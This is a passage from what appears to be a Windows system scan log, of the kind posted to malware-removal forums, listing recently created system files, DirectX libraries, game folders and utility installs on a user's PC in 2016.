2016-09-03 19:25 - 2016-08-20 10:16 - 01959264 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-09-03 19:25 - 2016-08-20 10:14 - 00570720 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-09-03 19:25 - 2016-08-20 10:04 - 01430200 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-09-03 19:25 - 2016-08-20 10:03 - 05722312 ____C (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-09-03 19:25 - 2016-08-20 10:03 - 00852824 ____C (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-09-03 19:25 - 2016-08-20 10:02 - 02166232 ____C (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-09-03 19:25 - 2016-08-20 10:02 - 00846552 ____C (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-09-03 19:25 - 2016-08-20 09:59 - 20965240 ____C (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-09-03 19:25 - 2016-08-20 09:59 - 01360464 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-09-03 19:25 - 2016-08-20 09:59 - 00980832 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-09-03 19:25 - 2016-08-20 09:55 - 01264912 ____C (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-09-03 19:25 - 2016-08-20 09:45 - 00018944 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2016-09-03 19:25 - 2016-08-20 09:44 - 00225280 ____C (Microsoft Corporation) C:\WINDOWS\system32\C_G18030.DLL
2016-09-03 19:25 - 2016-08-20 09:44 - 00087040 ____C (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2016-09-03 19:25 - 2016-08-20 09:44 - 00068096 ____C (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2016-09-03 19:25 - 2016-08-20 09:44 - 00065024 ____C (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll
2016-09-03 19:25 - 2016-08-20 09:44 - 00047104 ____C (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll
2016-09-03 19:25 - 2016-08-20 09:44 - 00017920 ____C (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-09-03 19:25 - 2016-08-20 09:44 - 00012800 ____C (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL
2016-09-03 19:25 - 2016-08-20 09:42 - 00158720 ____C (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-09-03 19:25 - 2016-08-20 09:42 - 00073216 ____C (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2016-09-03 19:25 - 2016-08-20 09:42 - 00059904 ____C (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2016-09-03 19:25 - 2016-08-20 09:42 - 00051200 ____C (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2016-09-03 19:25 - 2016-08-20 09:41 - 00158208 ____C (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2016-09-03 19:25 - 2016-08-20 09:41 - 00145408 ____C (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2016-09-03 19:25 - 2016-08-20 09:41 - 00020992 ____C (Microsoft Corporation) C:\WINDOWS\system32\LicenseManagerSvc.dll
2016-09-03 19:25 - 2016-08-20 09:39 - 00491520 ____C (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-09-03 19:25 - 2016-08-20 09:39 - 00244224 ____C (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2016-09-03 19:25 - 2016-08-20 09:39 - 00207872 ____C (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2016-09-03 19:25 - 2016-08-20 09:39 - 00155648 ____C (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2016-09-03 19:25 - 2016-08-20 09:39 - 00069120 ____C (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll
2016-09-03 19:25 - 2016-08-20 09:38 - 00392704 ____C (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-09-03 19:25 - 2016-08-20 09:38 - 00358912 ____C (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-09-03 19:25 - 2016-08-20 09:38 - 00179712 ____C (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-09-03 19:25 - 2016-08-20 09:38 - 00171520 ____C (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2016-09-03 19:25 - 2016-08-20 09:37 - 00577536 ____C (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-09-03 19:25 - 2016-08-20 09:37 - 00554496 ____C (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-09-03 19:25 - 2016-08-20 09:37 - 00288768 ____C (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-09-03 19:25 - 2016-08-20 09:36 - 00389632 ____C (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-09-03 19:25 - 2016-08-20 09:36 - 00222720 ____C (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-09-03 19:25 - 2016-08-20 09:35 - 00754688 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-09-03 19:25 - 2016-08-20 09:35 - 00380928 ____C (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-09-03 19:25 - 2016-08-20 09:34 - 00592384 ____C (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-09-03 19:25 - 2016-08-20 09:34 - 00416256 ____C (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-09-03 19:25 - 2016-08-20 09:34 - 00253952 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-09-03 19:25 - 2016-08-20 09:34 - 00074240 ____C (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-09-03 19:25 - 2016-08-20 09:33 - 05398016 ____C (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2016-09-03 19:25 - 2016-08-20 09:33 - 01774080 ____C (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-09-03 19:25 - 2016-08-20 09:33 - 01013248 ____C (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-09-03 19:25 - 2016-08-20 09:31 - 04612096 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-09-03 19:25 - 2016-08-20 09:31 - 00151040 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2016-09-03 19:25 - 2016-08-20 09:30 - 01316352 ____C (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-09-03 19:25 - 2016-08-20 09:29 - 07624192 ____C (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-09-03 19:25 - 2016-08-20 09:29 - 01106944 ____C (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-09-03 19:25 - 2016-08-20 09:29 - 01077760 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2016-09-03 19:25 - 2016-08-20 09:29 - 00079872 ____C (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2016-09-03 19:25 - 2016-08-20 09:29 - 00020992 ____C (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-09-03 19:25 - 2016-08-20 09:28 - 00020480 ____C (Microsoft Corporation) C:\WINDOWS\system32\storagewmi_passthru.dll
2016-09-03 19:25 - 2016-08-20 09:27 - 00558080 ____C (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2016-09-03 19:25 - 2016-08-20 09:26 - 02711040 ____C (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-09-03 19:25 - 2016-08-20 09:26 - 02143232 ____C (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2016-09-03 19:25 - 2016-08-20 09:26 - 00020992 ____C (Microsoft Corporation) C:\WINDOWS\system32\delegatorprovider.dll
2016-09-03 19:25 - 2016-08-20 09:25 - 19418624 ____C (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-09-03 19:25 - 2016-08-20 09:24 - 03776000 ____C (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-09-03 19:25 - 2016-08-20 09:22 - 00640000 ____C (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-09-03 19:25 - 2016-08-20 09:20 - 01875456 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-09-03 19:25 - 2016-08-09 06:43 - 00162850 ____C C:\WINDOWS\system32\C_932.NLS
2016-09-03 19:24 - 2016-08-20 09:44 - 00058880 ____C (Microsoft Corporation) C:\WINDOWS\system32\ConfigureExpandedStorage.dll
2016-09-03 19:24 - 2016-08-20 09:41 - 00156672 ____C (Microsoft Corporation) C:\WINDOWS\system32\BcastDVRHelper.dll
2016-09-03 19:24 - 2016-08-20 09:26 - 00786944 ____C (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-09-03 19:24 - 2016-08-20 09:16 - 03105792 ____C (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2016-09-03 11:19 - 2016-09-11 13:29 - 00000000 ____D C:\WINDOWS\Minidump
2016-09-02 20:23 - 2016-08-26 10:13 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2016-09-02 20:23 - 2016-08-26 10:13 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2016-09-02 17:46 - 2016-09-02 17:46 - 00077824 _____ (Embarcadero Technologies, Inc.) C:\Users\Sina\AppData\Roaming\HelpButton.dll
2016-09-02 13:14 - 2016-09-11 15:18 - 00000000 ____D C:\Users\Sina\AppData\Roaming\IDM
2016-09-02 13:14 - 2016-09-11 13:49 - 00000000 ____D C:\Users\Sina\AppData\Roaming\DMCache
2016-09-02 13:14 - 2016-09-11 12:08 - 00000000 ___DC C:\Users\Sina\Downloads\Compressed
2016-09-02 13:14 - 2016-09-10 21:38 - 00000000 ___DC C:\Users\Sina\Downloads\Video
2016-09-02 13:14 - 2016-09-02 13:16 - 00000000 ____D C:\Program Files\Internet Download Manager
2016-09-02 13:14 - 2016-09-02 13:14 - 00000000 ____D C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2016-09-02 13:14 - 2016-09-02 13:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2016-09-02 13:14 - 2016-09-02 13:14 - 00000000 ____D C:\ProgramData\IDM
2016-09-02 01:21 - 2016-09-02 01:21 - 00000000 ___DC C:\Users\Sina\Documents\SkidRow
2016-09-02 00:51 - 2016-09-02 00:51 - 00000002 ____C C:\Users\Sina\Documents\Crusader kings 2 tile.config
2016-09-02 00:43 - 2016-09-02 00:43 - 00000000 ____D C:\Users\Sina\AppData\Local\Neal_Whittington
2016-09-01 02:42 - 2016-09-11 14:18 - 00000000 ____D C:\ProgramData\ProductData
2016-09-01 02:42 - 2016-09-11 14:18 - 00000000 ____D C:\Program Files\Common Files\IObit
2016-09-01 02:42 - 2016-09-01 02:45 - 00000000 ___DC C:\Users\Sina\AppData\LocalLow\IObit
2016-09-01 02:42 - 2016-09-01 02:43 - 00000000 ____D C:\Users\Sina\AppData\Roaming\ProductData
2016-09-01 02:42 - 2016-09-01 02:42 - 00000000 ___DC C:\WINDOWS\Tasks\ImCleanDisabled
2016-09-01 02:42 - 2016-09-01 02:42 - 00000000 ____D C:\ProgramData\BDLogging
2016-09-01 02:42 - 2016-09-01 02:42 - 00000000 ____D C:\ProgramData\{D76294E6-03B8-4971-AF2E-3F846161A690}
2016-09-01 02:42 - 2016-09-01 02:42 - 00000000 ____D C:\ProgramData\{ACBCD40A-42A8-4FF9-BD42-ABCD14998CBA}
2016-09-01 02:42 - 2014-10-22 15:29 - 00169992 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
2016-09-01 02:40 - 2016-09-11 14:18 - 00000000 ____D C:\Users\Sina\AppData\Roaming\IObit
2016-09-01 02:39 - 2016-09-11 14:18 - 00000000 ____D C:\Program Files\IObit
2016-09-01 02:39 - 2016-09-01 03:12 - 00000000 ____D C:\ProgramData\IObit
2016-09-01 02:35 - 2016-09-01 02:35 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-08-31 22:36 - 2016-08-31 22:36 - 00000000 ____D C:\Users\Sina\AppData\Local\Setup193681968
2016-08-31 22:36 - 2016-08-31 22:36 - 00000000 ____D C:\Users\Sina\AppData\Local\fefo
2016-08-31 22:36 - 2016-08-31 22:36 - 00000000 ____D C:\Users\Sina\AppData\Local\{75154349-51BD-2FF1-3C25-0A19184DF681}
2016-08-31 22:35 - 2009-11-07 22:59 - 00188644 _____ C:\WINDOWS\system32\nfsDigitalClock03.scr
2016-08-31 22:30 - 2016-09-11 12:31 - 00000000 ____D C:\Program Files\NewFreeScreensavers
2016-08-31 22:28 - 2016-08-31 22:30 - 00000000 ____D C:\Program Files\ByteFence
2016-08-31 21:45 - 2016-08-31 22:42 - 00000140 _____ C:\WINDOWS\Reimage.ini
2016-08-29 14:47 - 2015-09-19 02:10 - 00039528 _____ (AnchorFree Inc.) C:\WINDOWS\system32\Drivers\hssdrv6.sys
2016-08-28 22:07 - 2016-09-11 14:07 - 00000000 ____D C:\Users\Sina\AppData\Roaming\MPC-HC
2016-08-28 22:06 - 2016-08-28 22:07 - 00000000 ____D C:\Program Files\MPC-HC
2016-08-28 14:16 - 2010-06-02 04:55 - 00527192 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_7.dll
2016-08-28 14:16 - 2010-06-02 04:55 - 00239960 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_7.dll
2016-08-28 14:16 - 2010-06-02 04:55 - 00074072 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_5.dll
2016-08-28 14:16 - 2010-05-26 11:41 - 02106216 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_43.dll
2016-08-28 14:16 - 2010-05-26 11:41 - 01998168 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_43.dll
2016-08-28 14:16 - 2010-05-26 11:41 - 01868128 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dcsx_43.dll
2016-08-28 14:16 - 2010-05-26 11:41 - 00470880 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_43.dll
2016-08-28 14:16 - 2010-05-26 11:41 - 00248672 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx11_43.dll
2016-08-28 14:16 - 2010-02-04 10:01 - 00528216 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_6.dll
2016-08-28 14:16 - 2010-02-04 10:01 - 00238936 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_6.dll
2016-08-28 14:16 - 2010-02-04 10:01 - 00074072 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_4.dll
2016-08-28 14:16 - 2010-02-04 10:01 - 00022360 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_7.dll
2016-08-28 14:16 - 2009-09-04 17:44 - 00515416 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_5.dll
2016-08-28 14:16 - 2009-09-04 17:44 - 00238936 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_5.dll
2016-08-28 14:16 - 2009-09-04 17:44 - 00069464 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_3.dll
2016-08-28 14:16 - 2009-09-04 17:29 - 05501792 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dcsx_42.dll
2016-08-28 14:16 - 2009-09-04 17:29 - 00453456 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_42.dll
2016-08-28 14:16 - 2009-09-04 17:29 - 00235344 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx11_42.dll
2016-08-28 14:16 - 2009-03-16 14:18 - 00517448 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_4.dll
2016-08-28 14:16 - 2009-03-16 14:18 - 00235352 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_4.dll
2016-08-28 14:16 - 2009-03-16 14:18 - 00022360 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_6.dll
2016-08-28 14:16 - 2009-03-09 15:27 - 01846632 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_41.dll
2016-08-28 14:16 - 2009-03-09 15:27 - 00453456 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_41.dll
2016-08-28 14:16 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_3.dll
2016-08-28 14:16 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_3.dll
2016-08-28 14:16 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_2.dll
2016-08-28 14:16 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_5.dll
2016-08-28 14:16 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_40.dll
2016-08-28 14:16 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_40.dll
2016-08-28 14:16 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_40.dll
2016-08-28 14:16 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_2.dll
2016-08-28 14:16 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_1.dll
2016-08-28 14:16 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_2.dll
2016-08-28 14:16 - 2008-07-10 11:01 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_39.dll
2016-08-28 14:16 - 2008-07-10 11:00 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_39.dll
2016-08-28 14:16 - 2008-07-10 11:00 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_39.dll
2016-08-28 14:16 - 2008-05-30 14:19 - 00507400 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_1.dll
2016-08-28 14:16 - 2008-05-30 14:18 - 00238088 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_1.dll
2016-08-28 14:16 - 2008-05-30 14:17 - 00065032 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAPOFX1_0.dll
2016-08-28 14:16 - 2008-05-30 14:17 - 00025608 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_4.dll
2016-08-28 14:16 - 2008-05-30 14:11 - 03850760 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_38.dll
2016-08-28 14:16 - 2008-05-30 14:11 - 01491992 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_38.dll
2016-08-28 14:16 - 2008-05-30 14:11 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_38.dll
2016-08-28 14:16 - 2008-03-05 16:03 - 00479752 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_0.dll
2016-08-28 14:16 - 2008-03-05 16:03 - 00238088 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine3_0.dll
2016-08-28 14:16 - 2008-03-05 16:00 - 00025608 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_3.dll
2016-08-28 14:16 - 2008-03-05 15:56 - 03786760 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_37.dll
2016-08-28 14:16 - 2008-03-05 15:56 - 01420824 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_37.dll
2016-08-28 14:16 - 2008-02-05 23:07 - 00462864 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_37.dll
2016-08-28 14:16 - 2007-10-22 03:39 - 00267272 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_10.dll
2016-08-28 14:16 - 2007-10-22 03:37 - 00017928 _____ (Microsoft Corporation) C:\WINDOWS\system32\X3DAudio1_2.dll
2016-08-28 14:16 - 2007-10-12 15:14 - 03734536 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_36.dll
2016-08-28 14:16 - 2007-10-12 15:14 - 01374232 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_36.dll
2016-08-28 14:16 - 2007-10-02 09:56 - 00444776 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_36.dll
2016-08-28 14:16 - 2007-07-20 00:57 - 00267112 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_9.dll
2016-08-28 14:16 - 2007-07-19 18:14 - 03727720 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_35.dll
2016-08-28 14:16 - 2007-07-19 18:14 - 01358192 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_35.dll
2016-08-28 14:16 - 2007-07-19 18:14 - 00444776 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_35.dll
2016-08-28 14:16 - 2007-06-20 20:46 - 00266088 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_8.dll
2016-08-28 14:16 - 2007-05-16 16:45 - 03497832 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_34.dll
2016-08-28 14:16 - 2007-05-16 16:45 - 01124720 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_34.dll
2016-08-28 14:16 - 2007-05-16 16:45 - 00443752 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_34.dll
2016-08-28 14:16 - 2007-04-04 18:55 - 00261480 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_7.dll
2016-08-28 14:16 - 2007-03-15 16:57 - 00443752 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_33.dll
2016-08-28 14:16 - 2007-03-12 16:42 - 03495784 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_33.dll
2016-08-28 14:16 - 2007-03-12 16:42 - 01123696 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_33.dll
2016-08-28 14:16 - 2007-03-05 12:42 - 00015128 _____ (Microsoft Corporation) C:\WINDOWS\system32\x3daudio1_1.dll
2016-08-28 14:16 - 2007-01-24 15:27 - 00255848 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_6.dll
2016-08-28 14:16 - 2006-12-08 12:02 - 00251672 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_5.dll
2016-08-28 14:16 - 2006-11-29 13:06 - 03426072 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_32.dll
2016-08-28 14:16 - 2006-11-29 13:06 - 00440080 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10.dll
2016-08-28 14:16 - 2006-09-28 16:05 - 02414360 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_31.dll
2016-08-28 14:16 - 2006-09-28 16:05 - 00237848 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_4.dll
2016-08-28 14:16 - 2006-07-28 09:30 - 00236824 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_3.dll
2016-08-28 14:16 - 2006-07-28 09:30 - 00062744 _____ (Microsoft Corporation) C:\WINDOWS\system32\xinput1_2.dll
2016-08-28 14:16 - 2006-05-31 07:24 - 00230168 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_2.dll
2016-08-28 14:16 - 2006-03-31 12:40 - 02388176 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_30.dll
2016-08-28 14:16 - 2006-03-31 12:39 - 00229584 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_1.dll
2016-08-28 14:16 - 2006-03-31 12:39 - 00062672 _____ (Microsoft Corporation) C:\WINDOWS\system32\xinput1_1.dll
2016-08-28 14:16 - 2006-02-03 08:43 - 02332368 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_29.dll
2016-08-28 14:16 - 2006-02-03 08:42 - 00230096 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_0.dll
2016-08-28 14:16 - 2006-02-03 08:41 - 00014032 _____ (Microsoft Corporation) C:\WINDOWS\system32\x3daudio1_0.dll
2016-08-28 14:16 - 2005-12-05 18:09 - 02323664 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_28.dll
2016-08-28 14:16 - 2005-07-22 19:59 - 02319568 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_27.dll
2016-08-28 14:16 - 2005-05-26 15:34 - 02297552 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_26.dll
2016-08-28 14:16 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_25.dll
2016-08-28 14:16 - 2005-02-05 19:45 - 02222800 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_24.dll
2016-08-27 21:49 - 2016-08-27 21:49 - 00000000 ____D C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-08-27 15:30 - 2016-08-27 15:30 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-08-27 08:16 - 2016-08-27 08:16 - 00000000 ___DC C:\Users\Sina\Documents\Paradox Interactive
2016-08-26 18:21 - 2016-08-26 18:22 - 00000000 ____D C:\Users\Sina\AppData\Roaming\Mount&Blade Warband
2016-08-26 18:21 - 2016-08-26 18:21 - 00000000 ____D C:\ProgramData\SkidRow
2016-08-26 18:21 - 2009-09-04 17:29 - 01974616 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_42.dll
2016-08-26 18:21 - 2009-09-04 17:29 - 01892184 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_42.dll
2016-08-26 18:21 - 2009-03-09 15:27 - 04178264 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DX9_41.dll
2016-08-26 18:21 - 2007-04-04 18:53 - 00081768 _____ (Microsoft Corporation) C:\WINDOWS\system32\xinput1_3.dll
2016-08-26 15:53 - 2016-09-11 13:27 - 00000000 ____D C:\Users\Sina\AppData\Roaming\uTorrent
2016-08-26 14:00 - 2016-08-27 21:29 - 00000000 ____D C:\Program Files\Common Files\Steam
2016-08-26 12:32 - 2016-08-26 12:32 - 00000000 ____D C:\Users\Sina\AppData\Local\Steam
2016-08-26 12:32 - 2016-08-26 12:32 - 00000000 ____D C:\Users\Sina\AppData\Local\CEF
2016-08-26 11:32 - 2016-08-26 11:32 - 00000451 _____ C:\WINDOWS\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
2016-08-26 00:14 - 2016-08-02 08:55 - 01456640 ____C (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-08-26 00:14 - 2016-08-02 08:53 - 06474752 ____C (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-08-26 00:14 - 2016-07-22 05:56 - 00054624 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2016-08-26 00:14 - 2016-07-22 05:48 - 00297552 ____C (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll
2016-08-26 00:14 - 2016-07-22 05:41 - 01344992 ____C (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-08-26 00:14 - 2016-07-22 05:18 - 00622592 ____C (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-08-26 00:13 - 2016-08-02 08:56 - 00353792 ____C (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll
2016-08-26 00:13 - 2016-07-22 05:19 - 01343488 ____C (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2016-08-26 00:11 - 2016-09-01 02:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2016-08-25 23:42 - 2016-08-06 08:11 - 13867520 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-08-25 23:42 - 2016-08-06 08:10 - 00322048 ____C (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-08-25 23:42 - 2016-08-06 07:56 - 02422784 ____C (Microsoft Corporation) C:\WINDOWS\system32\MSAJApi.dll
2016-08-25 23:41 - 2016-08-06 09:00 - 00320144 ____C (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-08-25 23:41 - 2016-08-06 08:52 - 00173408 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys
2016-08-25 23:41 - 2016-08-06 08:46 - 00798504 ____C (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
